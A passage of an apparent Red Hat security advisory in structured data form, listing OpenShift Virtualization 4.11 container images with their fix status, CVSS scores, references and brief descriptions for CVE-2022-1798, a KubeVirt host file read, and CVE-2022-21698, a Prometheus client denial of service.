"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-21698", cwe: { id: "CWE-772", name: "Missing Release of Resource after Effective Lifetime", }, discovery_date: "2022-01-19T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2045880", }, ], notes: [ { category: "description", text: "A denial of service attack was found in prometheus/client_golang. This flaw allows an attacker to produce a denial of service attack on an HTTP server by exploiting the InstrumentHandlerCounter function in the version below 1.11.1, resulting in a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "prometheus/client_golang: Denial of service using InstrumentHandlerCounter", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a moderate impact for two main reasons. The opportunity for a Denial of Service is limited to the golang runtime. In the case of OpenShift Container Platform, this would be restricted within each individual container. Additionally, this is in alignment with upstream's (the Prometheus project) impact rating.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ 